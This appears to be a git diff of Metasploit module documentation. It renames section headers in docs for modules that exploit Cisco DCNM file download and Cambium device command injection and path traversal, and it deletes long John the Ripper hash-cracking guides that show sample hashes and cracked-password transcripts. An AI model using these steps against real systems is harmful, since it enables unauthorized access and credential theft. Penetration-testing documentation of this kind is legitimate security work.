 - `use auxiliary/admin/cisco/cisco_asa_extrabacon`
@@ -1,4 +1,4 @@
-## Introduction
+## Vulnerable Application

 Cisco Data Center Network Manager exposes a servlet to download files on /fm/downloadServlet.
 An authenticated user can abuse this servlet to download arbitrary files as root by specifying
@@ -8,21 +8,7 @@ This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and
 work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit
 (see References to understand why), on the other versions it abuses CVE-2019-1619 to bypass authentication.

-
-## Author and discoverer
-
-Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
-
-
-## References
-
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-file-dwnld
-https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_download.rb
-https://seclists.org/fulldisclosure/2019/Jul/7
-
-
-## Usage
+## Scenarios

 Setup RHOST, pick the file to download (FILENAME, default is /etc/shadow) and enjoy!

@@ -8,7 +8,7 @@ Cambium cnPilot r200/r201 device software versions 4.2.3-R4 and newer, contain a
 4. Do: ```set CMD [command]```
 5. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/http/cnpilot_r_cmd_exec
@@ -1,3 +1,5 @@
+## Vulnerable Application
+
 This module exploits a File Path Traversal vulnerability in Cambium cnPilot r200/r201 devices to read arbitrary files off the file system. Affected versions - 4.3.3-R4 and prior.

 ## Verification Steps
@@ -8,7 +10,7 @@ This module exploits a File Path Traversal vulnerability in Cambium cnPilot r200
 4. Do: ```set FILENAME [filename]```
 5. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/http/cnpilot_r_fpt
@@ -8,7 +8,7 @@ This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000
 4. Do: ```set CMD [COMMAND]```
 5. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/http/epmp1000_get_chart_cmd_exec
@@ -9,7 +9,7 @@ This module exploits an access control vulnerability in Cambium ePMP device mana
 5. Do: ```set NEW_PASSWORD newpass```
 6. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use use auxiliary/scanner/http/epmp1000_reset_pass
@@ -15,7 +15,7 @@ attacker on the local network can send a crafted request to broadcast a fake vid

 Doo-doodoodoodoodoo-doo, Epic Sax Guy will be broadcasted to the remote system.

-## Sample Output
+## Scenarios

 ```
 msf5 > use auxiliary/admin/http/supra_smart_cloud_tv_rfi 
@@ -64,7 +64,7 @@ msf auxiliary(phoenix_command) > run
 [*] Auxiliary module execution completed
 ```

-## Module Options
+## Options
 ```
 msf auxiliary(phoenix_command) > show options

@@ -9,8 +9,6 @@

 ## Verification Steps

-  Example steps in this format (is also in the PR):
-
  1. Install the application
  2. Start msfconsole
  3. Do: ```use auxiliary/admin/smb/webexec_command```
@@ -22,7 +20,7 @@

 ## Options

-  **FORCE_GUI**
+### FORCE_GUI

  Uses WMIC to create a GUI

@@ -1,141 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode AIX 
-  based password hashes, such as:
-
-  * `DES` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with a `des` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_aix```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:des_password hash:rEK1ecacw.7.c jtr:des
-creds add user:des_passphrase hash:qiyh4XPJGsOZ2MEAyLkfWqeQ jtr:des
-```
-
-Crack them:
-
-```
-[*] Hashes Written out to /tmp/hashes_tmp20190211-5021-1p3x0lx
-[*] Wordlist file written out to /tmp/jtrtmp20190211-5021-66w3u0
-[*] Cracking descrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:00 DONE (2019-02-11 19:29) 0g/s 4206Kp/s 4206Kc/s 4206KC/s scandal..vagrant
-Session completed
-[*] Cracking descrypt hashes in single mode...
-Using default input encoding: UTF-8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:05 DONE (2019-02-11 19:29) 0g/s 6681Kp/s 6681Kc/s 6681KC/s qt1902..tude1900
-Session completed
-[*] Cracking descrypt hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-Will run 8 OpenMP threads
-Warning: MaxLen = 20 is too large for the current hash type, reduced to 8
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:05 DONE (2019-02-11 19:29) 0g/s 21083Kp/s 21083Kc/s 21083KC/s 73602400..73673952
-Session completed
-[*] Cracked Passwords this run:
-[+] des_password:password
-[+] des_passphrase:????????se
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_aix) > creds
-Credentials
-===========
-
-host  origin  service  public          private                   realm  private_type        JtR Format
----  ------  -------  ------          -------                   -----  ------------        ----------
-                       des_passphrase  ????????se                       Password            
-                       des_passphrase  qiyh4XPJGsOZ2MEAyLkfWqeQ         Nonreplayable hash  des
-                       des_password    rEK1ecacw.7.c                    Nonreplayable hash  des
-                       des_password    password                         Password            
-
-```
@@ -1,176 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Linux
-  based password hashes, such as:
-
-  * `DES` based passwords
-  * `MD5` based passwords
-  * `BSDi` based passwords
-  * With `crypt` set to `true`:
-    * `bf`, `bcrypt`, or `blowfish` based passwords
-    * `SHA256` based passwords
-    * `SHA512` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-  The definition of `crypt` according to JTR and waht algorithms it decodes can be found
-  [here](https://github.com/magnumripper/JohnTheRipper/blob/ae24a410baac45bb36884d793c429adeb7197336/src/c3_fmt.c#L731)
-
-## Verification Steps
-
-  1. Have at least one user with an `des`, `md5`, `bsdi`, `crypt`, `blowfish`, `sha512`, or `sha256` password hash in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_linux```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CRYPT**
-
-   Include `blowfish` and `SHA`(256/512) passwords.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:des_password hash:rEK1ecacw.7.c jtr:des
-creds add user:md5_password hash:$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ jtr:md5
-creds add user:bsdi_password hash:_J9..K0AyUubDrfOgO4s jtr:bsdi
-creds add user:sha256_password hash:$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5 jtr:sha256,crypt
-creds add user:sha512_password hash:$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 jtr:sha512,crypt
-creds add user:blowfish_password hash:$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe jtr:bf
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_linux 
-msf5 auxiliary(analyze/jtr_linux) > set crypt true
-crypt => true
-msf5 auxiliary(analyze/jtr_linux) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-5021-hqwf2h
-[*] Wordlist file written out to /tmp/jtrtmp20190211-5021-1ixz59k
-[*] Cracking md5crypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] md5_password:password
-[*] Cracking descrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] des_password:password
-[*] Cracking bsdicrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] bsdi_password:password
-[*] Cracking crypt hashes in normal wordlist mode...
-Warning: hash encoding string length 20, type id #4
-appears to be unsupported on this system; will not load such hashes.
-Warning: hash encoding string length 60, type id $2
-appears to be unsupported on this system; will not load such hashes.
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] des_password:password
-[+] md5_password:password
-[+] sha256_password:password
-[+] sha512_password:password
-[*] Cracking bcrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] blowfish_password:password
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_linux) > creds
-Credentials
-===========
-
-host  origin  service  public             private                                                                                             realm  private_type        JtR Format
----  ------  -------  ------             -------                                                                                             -----  ------------        ----------
-                       bsdi_password      password                                                                                                   Password            
-                       des_password       password                                                                                                   Password            
-                       sha256_password    $5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5                                                    Nonreplayable hash  sha256,crypt
-                       md5_password       password                                                                                                   Password            
-                       md5_password       $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/                                                                         Nonreplayable hash  md5
-                       bsdi_password      _J9..K0AyUubDrfOgO4s                                                                                       Nonreplayable hash  bsdi
-                       sha512_password    password                                                                                                   Password            
-                       blowfish_password  $2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe                                               Nonreplayable hash  bf
-                       sha512_password    $6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1         Nonreplayable hash  sha512,crypt
-                       sha256_password    password                                                                                                   Password            
-                       des_password       rEK1ecacw.7.c                                                                                              Nonreplayable hash  des
-                       blowfish_password  password                                                                                                   Password            
-
-```
@@ -1,157 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Microsoft
-  SQL based password hashes, such as:
-
-  * `mssql` based passwords
-  * `mssql05` based passwords
-  * `mssql12` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with an `mssql`, `mssql05` or `mssql12` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_mssql_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:mssql05_toto hash:0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 jtr:mssql05
-creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 jtr:mssql
-creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 jtr:mssql12 
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_mssql_fast 
-msf5 auxiliary(analyze/jtr_mssql_fast) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-u353o8
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-hcwr36
-[*] Cracking mssql05 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql05 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql05 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mssql05_toto:toto
-[+] mssql_foo:foo
-[+] mssql05_toto:toto
-[+] mssql_foo:foo
-[*] Cracking mssql hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mssql_foo:FOO
-[+] mssql_foo:FOO
-[*] Cracking mssql12 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql12 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql12 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mssql12_Password1!:Password1!
-[+] mssql12_Password1!:Password1!
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_mssql_fast) > creds
-Credentials
-===========
-
-host  origin  service  public              private                                                                                                                                         realm  private_type        JtR Format
----  ------  -------  ------              -------                                                                                                                                         -----  ------------        ----------
-                       mssql05_toto        toto                                                                                                                                                   Password            
-                       mssql05_toto        0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908                                                                                                 Nonreplayable hash  mssql05
-                       mssql_foo           FOO                                                                                                                                                    Password            
-                       mssql_foo           foo                                                                                                                                                    Password            
-                       mssql_foo           0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254                                                         Nonreplayable hash  mssql
-                       mssql12_Password1!  Password1!                                                                                                                                             Password            
-                       mssql12_Password1!  0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16         Nonreplayable hash  mssql12
-
-```
@@ -1,139 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode MySQL
-  based password hashes, such as:
-
-  * `mysql` (pre 4.1) based passwords
-  * `mysql-sha1` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with an `mysql`, or `mysql-sha1` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_mysql_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql
-creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_mysql_fast 
-msf5 auxiliary(analyze/jtr_mysql_fast) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-o7pt47
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-3t366y
-[*] Cracking mysql hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mysql_probe:probe
-[*] Cracking mysql-sha1 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql-sha1 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql-sha1 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mysql-sha1_tere:tere
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_mysql_fast) > creds
-Credentials
-===========
-
-host  origin  service  public           private                                    realm  private_type        JtR Format
----  ------  -------  ------           -------                                    -----  ------------        ----------
-                       mysql_probe      probe                                             Password            
-                       mysql_probe      445ff82636a7ba59                                  Nonreplayable hash  mysql
-                       mysql-sha1_tere  tere                                              Password            
-                       mysql-sha1_tere  *5AD8F88516BD021DD43F171E2C785C69F8E54ADB         Nonreplayable hash  mysql-sha1
-
-```
@@ -1,168 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode oracle
-  based password hashes, such as:
-
-  * `oracle` (<=10) aka `des` based passwords
-  * `oracle11` based passwords
-  * Oracle 11 and 12c backwards compatibility `H` field (MD5)
-  * `oracle12c` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-  For a detailed explanation of Oracle 11/12c formats, see
-  [www.trustwave.com](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/changes-in-oracle-database-12c-password-hashes/).
-
-  Oracle 11/12c `H` field is `dynamic_1506` in JtR and added
-  [here](https://github.com/magnumripper/JohnTheRipper/commit/53973c5e6eb026ea232ba643f9aa20a1ffee0ffb)
-
-## Verification Steps
-
-  1. Have at least one user with an `oracle`, `oracle11`, or `oracle12c` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_oracle_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle
-creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle
-creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
-creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
-creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B' jtr:pbkdf2,oracle12c
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_oracle_fast 
-msf5 auxiliary(analyze/jtr_oracle_fast) > run
-
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-v6a8wg
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-123367o
-[*] Cracking oracle hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking oracle hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] simon:A
-[+] SYSTEM:THALES
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1skc10b
-[*] Cracking dynamic_1506 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking dynamic_1506 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1qwsyoy
-[*] Cracking oracle11 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking oracle11 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] DEMO:epsilon
